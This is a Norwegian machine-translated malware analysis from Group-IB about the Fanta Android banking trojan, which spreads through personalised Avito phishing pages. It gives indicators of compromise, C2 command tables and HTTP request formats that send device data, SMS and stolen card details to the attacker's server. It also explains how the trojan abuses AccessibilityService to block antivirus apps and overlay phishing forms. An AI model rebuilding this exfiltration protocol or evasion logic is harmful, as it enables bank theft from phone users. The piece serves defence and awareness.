En dag du ønsker å selge noe på Avito, og etter å ha lagt ut en detaljert beskrivelse av produktet ditt (for eksempel en RAM-modul), vil du motta denne meldingen:
Når du åpner koblingen, vil du se en tilsynelatende ufarlig side som varsler deg, den glade og vellykkede selgeren, om at et kjøp er gjort:
Når du klikker på "Fortsett"-knappen, vil en APK-fil med et ikon og et tillitsvekkende navn lastes ned til Android-enheten din. Du installerte en applikasjon som av en eller annen grunn ba om AccessibilityService-rettigheter, så dukket det opp et par vinduer og forsvant raskt og... Det var det.
Du går for å sjekke saldoen din, men av en eller annen grunn ber bankappen din om kortopplysningene dine igjen. Etter å ha lagt inn dataene, skjer noe forferdelig: av en eller annen grunn som fortsatt er uklar for deg, begynner penger å forsvinne fra kontoen din. Du prøver å løse problemet, men telefonen din motstår: den trykker på "Tilbake" og "Hjem" -tastene, slår seg ikke av og lar deg ikke aktivere noen sikkerhetstiltak. Som et resultat står du igjen uten penger, varene dine er ikke kjøpt, du er forvirret og lurer på: hva skjedde?
Svaret er enkelt: du har blitt et offer for Android Trojan Fanta, et medlem av Flexnet-familien. Hvordan skjedde dette? La oss forklare nå.
Forfattere: Andrey Polovinkin, juniorspesialist i analyse av skadelig programvare, Ivan Pisarev, spesialist i malware-analyse.
Noen statistikk
Flexnet-familien av Android-trojanere ble først kjent tilbake i 2015. Over en ganske lang periode med aktivitet utvidet familien seg til flere underarter: Fanta, Limebot, Lipton, etc. Trojaneren, så vel som infrastrukturen knyttet til den, står ikke stille: nye effektive distribusjonsordninger utvikles - i vårt tilfelle er phishing-sider av høy kvalitet rettet mot en spesifikk bruker-selger, og de trojanske utviklerne følger fasjonable trender innen virusskriving - legger til ny funksjonalitet som gjør det mulig å stjele mer effektivt penger fra infiserte enheter og omgå beskyttelsesmekanismer.
Kampanjen beskrevet i denne artikkelen er rettet mot brukere fra Russland; et lite antall infiserte enheter ble registrert i Ukraina, og enda færre i Kasakhstan og Hviterussland.
Selv om Flexnet har vært i Android Trojan-arenaen i over 4 år nå og har blitt studert i detalj av mange forskere, er det fortsatt i god form. Fra januar 2019 er det potensielle skadebeløpet mer enn 35 millioner rubler - og dette er bare for kampanjer i Russland. I 2015 ble forskjellige versjoner av denne Android-trojaneren solgt på underjordiske fora, hvor kildekoden til trojaneren med en detaljert beskrivelse også kunne bli funnet. Dette betyr at statistikken over skade i verden er enda mer imponerende. Ikke en dårlig indikator for en så gammel mann, er det ikke?
Fra salg til bedrag
Som man kan se fra det tidligere presenterte skjermbildet av en phishing-side for Internett-tjenesten for å legge ut annonser Avito, var den forberedt for et spesifikt offer. Tilsynelatende bruker angriperne en av Avitos parsere, som trekker ut telefonnummeret og navnet til selgeren, samt produktbeskrivelsen. Etter å ha utvidet siden og klargjort APK-filen, får offeret tilsendt en SMS med navnet hans og en lenke til en phishing-side som inneholder en beskrivelse av produktet hans og beløpet mottatt fra "salget" av produktet. Ved å klikke på knappen mottar brukeren en ondsinnet APK-fil - Fanta.
En studie av shcet491[.]ru-domenet viste at det er delegert til Hostingers DNS-servere:
- ns1.hostinger.ru
- ns2.hostinger.ru
- ns3.hostinger.ru
- ns4.hostinger.ru
Domenesonefilen inneholder oppføringer som peker til IP-adressene 31.220.23[.]236, 31.220.23[.]243 og 31.220.23[.]235. Domenets primære ressurspost (A-post) peker imidlertid til en server med IP-adressen 178.132.1[.]240.
IP-adressen 178.132.1[.]240 ligger i Nederland og tilhører hosteren WorldStream. IP-adressene 31.220.23[.]235, 31.220.23[.]236 og 31.220.23[.]243 er lokalisert i Storbritannia og tilhører den delte vertsserveren HOSTINGER. Brukt som opptaker openprov-ru. Følgende domener ble også løst til IP-adressen 178.132.1[.]240:
- sdelka-ru[.]ru
- tovar-av[.]ru
- av-tovar[.]ru
- ru-sdelka[.]ru
- shcet382[.]ru
- sdelka221[.]ru
- sdelka211[.]ru
- vyplata437[.]ru
- viplata291[.]ru
- perevod273[.]ru
- perevod901[.]ru
Det skal bemerkes at lenker i følgende format var tilgjengelige fra nesten alle domener:
http://(www.){0,1}<%domain%>/[0-9]{7}
Denne malen inneholder også en lenke fra en SMS-melding. Basert på historiske data ble det funnet at ett domene tilsvarer flere lenker i mønsteret beskrevet ovenfor, noe som indikerer at ett domene ble brukt til å distribuere trojaneren til flere ofre.
La oss hoppe litt videre: trojaneren lastet ned via en lenke fra en SMS bruker adressen som en kontrollserver onusedseddohap[.]klubb. Dette domenet ble registrert 2019-03-12, og fra og med 2019-04-29 samhandlet APK-applikasjoner med dette domenet. Basert på data hentet fra VirusTotal, samhandlet totalt 109 applikasjoner med denne serveren. Selve domenet ble løst til IP-adressen 217.23.14[.]27, som ligger i Nederland og eies av vertskapet WorldStream. Brukt som opptaker namecheap. Domener er også løst til denne IP-adressen bad-racoon[.]klubb (fra og med 2018-09-25) og bad-racoon[.]live (fra og med 2018-10-25). Med domene bad-racoon[.]klubb mer enn 80 APK-filer samhandlet med bad-racoon[.]live - Mer enn 100.
Generelt utvikler angrepet seg som følger:
Hva er under Fantas lokk?
Som mange andre Android-trojanere, er Fanta i stand til å lese og sende SMS-meldinger, sende USSD-forespørsler og vise sine egne vinduer på toppen av applikasjoner (inkludert banktjenester). Imidlertid har arsenalet av funksjonalitet til denne familien kommet: Fanta begynte å bruke Tilgjengelighetstjeneste for ulike formål: lese innholdet i varsler fra andre applikasjoner, forhindre gjenkjenning og stoppe kjøringen av en trojaner på en infisert enhet, etc. Fanta fungerer på alle versjoner av Android som ikke er yngre enn 4.4. I denne artikkelen skal vi se nærmere på følgende Fanta-eksempel:
- MD5: 0826bd11b2c130c4c8ac137e395ac2d4
- SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
- SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb
Umiddelbart etter lansering
Umiddelbart etter lansering skjuler trojaneren sitt ikon. Applikasjonen kan bare fungere hvis navnet på den infiserte enheten ikke er på listen:
- android_x86
- VirtualBox
- Nexus 5X (bullhead)
- Nexus 5 (barberhøvel)
Denne kontrollen utføres i hovedtjenesten til trojaneren - MainService. Når den startes for første gang, initialiseres applikasjonens konfigurasjonsparametere til standardverdier (formatet for lagring av konfigurasjonsdata og deres betydning vil bli diskutert senere), og en ny infisert enhet registreres på kontrollserveren. En HTTP POST-forespørsel med meldingstypen vil bli sendt til serveren register_bot og informasjon om den infiserte enheten (Android-versjon, IMEI, telefonnummer, operatørnavn og landskode som operatøren er registrert i). Adressen fungerer som kontrollserver hXXp://onuseseddohap[.]club/controller.php. Som svar sender serveren en melding som inneholder feltene bot_id, bot_pwd, server — applikasjonen lagrer disse verdiene som parametere for CnC-serveren. Parameter server valgfritt hvis feltet ikke ble mottatt: Fanta bruker registreringsadressen - hXXp://onuseseddohap[.]club/controller.php. Funksjonen til å endre CnC-adressen kan brukes til å løse to problemer: å fordele belastningen jevnt mellom flere servere (hvis det er et stort antall infiserte enheter, kan belastningen på en uoptimalisert webserver være høy), og også å bruke en alternativ server i tilfelle feil på en av CnC-serverne.
Hvis det oppstår en feil under sending av forespørselen, vil trojaneren gjenta registreringsprosessen etter 20 sekunder.
Når enheten har blitt registrert, vil Fanta vise følgende melding til brukeren:
Viktig merknad: tjenesten ringte System sikkerhet — navnet på den trojanske tjenesten, og etter å ha klikket på knappen ОК Et vindu åpnes med tilgjengelighetsinnstillingene for den infiserte enheten, der brukeren må gi tilgjengelighetsrettigheter for den ondsinnede tjenesten:
Så snart brukeren slår seg på Tilgjengelighetstjeneste, Fanta får tilgang til innholdet i programvinduer og handlingene som utføres i dem:
Umiddelbart etter å ha mottatt tilgjengelighetsrettigheter, ber trojaneren om administratorrettigheter og rettigheter til å lese varsler:
Ved å bruke AccessibilityService simulerer applikasjonen tastetrykk, og gir seg selv alle nødvendige rettigheter.
Fanta oppretter flere databaseforekomster (som vil bli beskrevet senere) som er nødvendige for å lagre konfigurasjonsdata, samt informasjon som samles inn i prosessen om den infiserte enheten. For å sende den innsamlede informasjonen oppretter trojaneren en gjentatt oppgave designet for å laste ned felt fra databasen og motta en kommando fra kontrollserveren. Intervallet for tilgang til CnC er satt avhengig av Android-versjonen: i tilfelle 5.1 vil intervallet være 10 sekunder, ellers 60 sekunder.
For å motta kommandoen sender Fanta en forespørsel GetTask til administrasjonsserveren. Som svar kan CnC sende en av følgende kommandoer:
| Lag | beskrivelse |
|---|---|
| 0 | Send SMS-melding |
| 1 | Foreta en telefonsamtale eller USSD-kommando |
| 2 | Oppdaterer en parameter pause |
| 3 | Oppdaterer en parameter avskjære |
| 6 | Oppdaterer en parameter smsManager |
| 9 | Begynn å samle inn SMS-meldinger |
| 11 | Tilbakestill telefonen til fabrikkinnstillinger |
| 12 | Aktiver/deaktiver logging av dialogboksoppretting |
Fanta samler også inn varsler fra 70 bankapper, raske betalingssystemer og e-lommebøker og lagrer dem i en database.
Lagre konfigurasjonsparametere
For å lagre konfigurasjonsparametere bruker Fanta en standard tilnærming for Android-plattformen - Preferanser-filer. Innstillingene vil bli lagret i en fil med navn innstillinger. En beskrivelse av de lagrede parameterne er i tabellen nedenfor.
| navn | Standardverdi | Mulige verdier | beskrivelse |
|---|---|---|---|
| id | 0 | Heltall | Bot-ID |
| server | hXXp://onuseseddohap[.]club/ | URL | Kontrollserveradresse |
| pwd | - | String | Server passord |
| pause | 20 | Heltall | Tidsintervall. Angir hvor lenge følgende oppgaver skal utsettes:
|
| avskjære | alle | alle/tlf.nr | Hvis feltet er lik strengen alle eller telNr, vil den mottatte SMS-meldingen bli fanget opp av applikasjonen og ikke vist til brukeren |
| smsManager | 0 | 0/1 | Aktiver/deaktiver applikasjonen som standard SMS-mottaker |
| readDialog | falsk | Sant/usant | Aktiver/deaktiver hendelseslogging TilgjengelighetEvent |
Fanta bruker også filen smsManager:
| navn | Standardverdi | Mulige verdier | beskrivelse |
|---|---|---|---|
| pckg | - | String | Navnet på SMS-meldingsadministratoren som er brukt |
Interaksjon med databaser
Under driften bruker trojaneren to databaser. Database navngitt a brukes til å lagre forskjellig informasjon samlet inn fra telefonen. Den andre databasen er navngitt fanta.db og brukes til å lagre innstillinger som er ansvarlige for å lage phishing-vinduer designet for å samle informasjon om bankkort.
Trojan bruker database а for å lagre innsamlet informasjon og logge handlingene dine. Data lagres i en tabell logger. For å lage en tabell, bruk følgende SQL-spørring:
create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)Databasen inneholder følgende informasjon:
1. Logger oppstarten av den infiserte enheten med en melding Telefonen slått på!
2. Meldinger fra applikasjoner. Meldingen genereres i henhold til følgende mal:
(<%App Name%>)<%Title%>: <%Notification text%>
3. Bankkortdata fra phishing-skjemaer laget av trojaneren. Parameter VIEW_NAME kan være en av følgende:
- AliExpress
- Avito
- Google Play
- Diverse <%App Name%>
Meldingen logges i formatet:
[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>
4. Innkommende/utgående SMS-meldinger i formatet:
([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>
5. Informasjon om pakken som oppretter dialogboksen i formatet:
(<%Package name%>)<%Package information%>
Eksempeltabell logger:
En av funksjonene til Fanta er innsamling av informasjon om bankkort. Datainnsamling skjer gjennom opprettelse av phishing-vinduer når du åpner bankapplikasjoner. Trojaneren oppretter phishing-vinduet bare én gang. Informasjon om at vinduet ble vist til brukeren lagres i en tabell innstillinger i databasen fanta.db. For å opprette en database, bruk følgende SQL-spørring:
create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);Alle tabellfelt innstillinger som standard initialisert til 1 (opprett et phishing-vindu). Etter at brukeren har lagt inn dataene sine, settes verdien til 0. Eksempel på tabellfelt innstillinger:
- kan_logge inn — feltet er ansvarlig for å vise skjemaet når du åpner en banksøknad
- første_bank - ikke brukt
- can_avito — feltet er ansvarlig for å vise skjemaet når du åpner Avito-applikasjonen
- can_ali — feltet er ansvarlig for å vise skjemaet når du åpner Aliexpress-applikasjonen
- kan_en annen – feltet er ansvarlig for å vise skjemaet når du åpner en søknad fra listen: Yula, Pandao, Drom Auto, Lommebok. Rabatt- og bonuskort, Aviasales, Booking, Trivago
- kan_kort — feltet er ansvarlig for å vise skjemaet ved åpning Google Play
Interaksjon med administrasjonsserveren
Nettverksinteraksjon med administrasjonsserveren skjer via HTTP-protokollen. For å jobbe med nettverket bruker Fanta det populære Retrofit-biblioteket. Forespørsler sendes til: hXXp://onuseseddohap[.]club/controller.php. Serveradressen kan endres ved registrering på serveren. Informasjonskapsler kan sendes som svar fra serveren. Fanta sender følgende forespørsler til serveren:
- Registrering av boten på kontrollserveren skjer én gang, ved første oppstart. Følgende data om den infiserte enheten sendes til serveren:
· Cookie - informasjonskapsler mottatt fra serveren (standardverdien er en tom streng)
· modus — strengkonstant register_bot
· prefiks — heltallskonstant 2
· versjon_sdk — er dannet i henhold til følgende mal: <%Build.MODEL%>/<%Build.VERSION.RELEASE%>(Avit)
· IMEI- — IMEI til den infiserte enheten
· land — koden for landet der operatøren er registrert, i ISO-format
· Antall - telefonnummer
· operatør — operatørnavnEt eksempel på en forespørsel sendt til serveren:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Content-Length: 144 Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>Som svar på forespørselen må serveren returnere et JSON-objekt som inneholder følgende parametere:
· bot_id — ID for den infiserte enheten. Hvis bot_id er lik 0, vil Fanta utføre forespørselen på nytt.
bot_pwd — passord for serveren.
server — kontrollserveradresse. Valgfri parameter. Hvis parameteren ikke er spesifisert, vil adressen som er lagret i applikasjonen bli brukt.Eksempel JSON-objekt:
{ "response":[ { "bot_id": <%BOT_ID%>, "bot_pwd": <%BOT_PWD%>, "server": <%SERVER%> } ], "status":"ok" }
- Be om å motta en kommando fra serveren. Følgende data sendes til serveren:
· Cookie — informasjonskapsler mottatt fra serveren
· bud - ID for den infiserte enheten som ble mottatt da forespørselen ble sendt register_bot
· pwd -passord for serveren
· divice_admin — feltet avgjør om administratorrettigheter er oppnådd. Hvis administratorrettigheter er oppnådd, er feltet lik 1, ellers 0
· tilgjengelighet — Driftsstatus for tilgjengelighetstjenesten. Hvis tjenesten ble startet, er verdien 1, ellers 0
· SMSManager — viser om trojaneren er aktivert som standardapplikasjon for mottak av SMS
· skjerm — viser hvilken tilstand skjermen er i. Verdien vil bli satt 1, hvis skjermen er på, ellers 0;Et eksempel på en forespørsel sendt til serveren:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>Avhengig av kommandoen kan serveren returnere et JSON-objekt med forskjellige parametere:
· Lag Send SMS-melding: Parametrene inneholder telefonnummeret, teksten til SMS-meldingen og ID-en til meldingen som sendes. Identifikatoren brukes når du sender en melding til serveren med type setSmsStatus.
{ "response": [ { "mode": 0, "sms_number": <%SMS_NUMBER%>, "sms_text": <%SMS_TEXT%>, "sms_id": %SMS_ID% } ], "status":"ok" }· Lag Foreta en telefonsamtale eller USSD-kommando: Telefonnummeret eller kommandoen kommer i svarteksten.
{ "response": [ { "mode": 1, "command": <%TEL_NUMBER%> } ], "status":"ok" }· Lag Endre intervallparameter.
{ "response": [ { "mode": 2, "interval": <%SECONDS%> } ], "status":"ok" }· Lag Endre avskjæringsparameter.
{ "response": [ { "mode": 3, "intercept": "all"/"telNumber"/<%ANY_STRING%> } ], "status":"ok" }· Lag Endre SmsManager-feltet.
{ "response": [ { "mode": 6, "enable": 0/1 } ], "status":"ok" }· Lag Samle SMS-meldinger fra en infisert enhet.
{ "response": [ { "mode": 9 } ], "status":"ok" }· Lag Tilbakestill telefonen til fabrikkinnstillinger:
{ "response": [ { "mode": 11 } ], "status":"ok" }· Lag Endre ReadDialog-parameter.
{ "response": [ { "mode": 12, "enable": 0/1 } ], "status":"ok" }
- Sender en melding med type setSmsStatus. Denne forespørselen gjøres etter at kommandoen er utført Send SMS-melding. Forespørselen ser slik ut:
POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0
mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>- Laster opp databaseinnhold. En rad sendes per forespørsel. Følgende data sendes til serveren:
· Cookie — informasjonskapsler mottatt fra serveren
· modus — strengkonstant setSaveInboxSms
· bud - ID for den infiserte enheten som ble mottatt da forespørselen ble sendt register_bot
· tekst — tekst i gjeldende databasepost (felt d fra bordet logger i databasen а)
· Antall — navn på gjeldende databasepost (felt p fra bordet logger i databasen а)
· sms_modus — heltallsverdi (felt m fra bordet logger i databasen а)Forespørselen ser slik ut:
POST /controller.php HTTP/1.1 Cookie: Content-Type: application/x-www-form-urlencoded Host: onuseseddohap.club Connection: close Accept-Encoding: gzip, deflate User-Agent: okhttp/3.6.0 mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>Hvis den sendes til serveren, vil raden bli slettet fra tabellen. Eksempel på et JSON-objekt returnert av serveren:
{ "response":[], "status":"ok" }
Samhandle med AccessibilityService
AccessibilityService ble implementert for å gjøre Android-enheter enklere å bruke for funksjonshemmede. I de fleste tilfeller er fysisk interaksjon nødvendig for å samhandle med en applikasjon. AccessibilityService lar deg gjøre dem programmatisk. Fanta bruker tjenesten til å lage falske vinduer i bankapplikasjoner og hindre brukere i å åpne systeminnstillinger og enkelte applikasjoner.
Ved å bruke funksjonaliteten til AccessibilityService overvåker trojaneren endringer i elementer på skjermen til den infiserte enheten. Som tidligere beskrevet inneholder Fanta-innstillingene en parameter som er ansvarlig for loggingsoperasjoner med dialogbokser - readDialog. Hvis denne parameteren er satt, vil informasjon om navnet og beskrivelsen av pakken som utløste hendelsen bli lagt til databasen. Trojaneren utfører følgende handlinger når hendelser utløses:
- Simulerer å trykke på tilbake- og hjemtastene i følgende tilfeller:
· hvis brukeren ønsker å starte enheten på nytt
· hvis brukeren ønsker å slette «Avito»-applikasjonen eller endre tilgangsrettigheter
· hvis det er en omtale av "Avito"-applikasjonen på siden
· når du åpner Google Play Protect-appen
· når du åpner sider med AccessibilityService-innstillinger
· når dialogboksen Systemsikkerhet vises
· når du åpner siden med «Tegn over annen app»-innstillingene
· når du åpner "Applikasjoner"-siden, "Gjenoppretting og tilbakestilling", "Tilbakestilling av data", "Tilbakestill innstillinger", "Utviklerpanel", "Spesial. muligheter", "Spesielle muligheter", "Spesielle rettigheter"
· hvis hendelsen ble generert av visse applikasjoner.Liste over applikasjoner
- android
- Master Lite
- Rengjør Master
- Clean Master for x86 CPU
- Meizu Application Permission Management
- MIUI-sikkerhet
- Clean Master - Antivirus & Cache and Garbage Cleaner
- Foreldrekontroll og GPS: Kaspersky SafeKids
- Kaspersky Antivirus AppLock & Web Security Beta
- Virus Cleaner, Antivirus, Cleaner (MAX Security)
- Mobile AntiVirus Security PRO
- Avast antivirus og gratis beskyttelse 2019
- Mobil sikkerhet MegaFon
- AVG Protection for Xperia
- Mobil sikkerhet
- Malwarebytes antivirus og beskyttelse
- Antivirus for Android 2019
- Security Master - Antivirus, VPN, AppLock, Booster
- AVG antivirus for Huawei nettbrett System Manager
- Samsung tilgjengelighet
- Samsung Smart Manager
- Sikkerhetsmester
- Speed Booster
- Dr.Web
- Dr.Web Security Space
- Dr.Web Mobile Control Center
- Dr.Web Security Space Life
- Dr.Web Mobile Control Center
- Antivirus og mobil sikkerhet
- Kaspersky Internet Security: Antivirus og beskyttelse
- Kaspersky batterilevetid: Saver & Booster
- Kaspersky Endpoint Security - beskyttelse og administrasjon
- AVG Antivirus gratis 2019 – Beskyttelse for Android
- Android antivirus
- Norton Mobile Security og Antivirus
- Antivirus, brannmur, VPN, mobilsikkerhet
- Mobilsikkerhet: antivirus, VPN, tyveribeskyttelse
- Antivirus for Android
- Hvis tillatelse blir bedt om når du sender en SMS-melding til et kortnummer, simulerer Fanta å klikke på avkrysningsboksen Husk valg og knapp sende.
- Når du prøver å fjerne administratorrettigheter fra trojaneren, låser den telefonskjermen.
- Hindrer å legge til nye administratorer.
- Hvis antivirusprogrammet dr.web oppdaget en trussel, imiterer Fanta å trykke på knappen overse.
- Trojaneren simulerer å trykke på tilbake- og hjem-knappen hvis hendelsen ble generert av applikasjonen Samsung Device Care.
- Fanta lager phishing-vinduer med skjemaer for å legge inn informasjon om bankkort dersom en applikasjon fra en liste med rundt 30 forskjellige internettjenester ble lansert. Blant dem: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drom Auto, etc.
Phishing-skjemaer
Fanta analyserer hvilke applikasjoner som kjører på den infiserte enheten. Hvis en interessesøknad ble åpnet, viser trojaneren et phishing-vindu på toppen av alle andre, som er et skjema for å legge inn bankkortinformasjon. Brukeren må legge inn følgende data:
- Kortnummer
- Kortutløpsdato
- CVV
- Kortholders navn (ikke for alle banker)
Avhengig av programmet som kjører, vil forskjellige phishing-vinduer vises. Nedenfor er eksempler på noen av dem:
AliExpress:
Avito:
For noen andre applikasjoner, f.eks. Google Play Market, Aviasales, Pandao, Booking, Trivago:
Hvordan det egentlig var
Heldigvis viste det seg at personen som mottok SMS-meldingen beskrevet i begynnelsen av artikkelen, var en spesialist på nettsikkerhet. Derfor er den virkelige, ikke-regissørens versjon forskjellig fra den som ble fortalt tidligere: en person mottok en interessant SMS, hvoretter han ga den til Group-IB Threat Hunting Intelligence-teamet. Resultatet av angrepet er denne artikkelen. Lykkelig slutt, ikke sant? Imidlertid slutter ikke alle historier så vellykket, og for at din ikke skal se ut som en regissør med et tap av penger, er det i de fleste tilfeller nok å overholde følgende lang beskrevne regler:
- ikke installer applikasjoner for en mobilenhet med Android OS fra andre kilder enn Google Play
- Når du installerer en applikasjon, vær spesielt oppmerksom på rettighetene som applikasjonen ber om
- Vær oppmerksom på utvidelsene til nedlastede filer
- installere Android OS-oppdateringer regelmessig
- ikke besøk mistenkelige ressurser og ikke last ned filer derfra
- Ikke klikk på lenker mottatt i SMS-meldinger.
Kilde: www.habr.com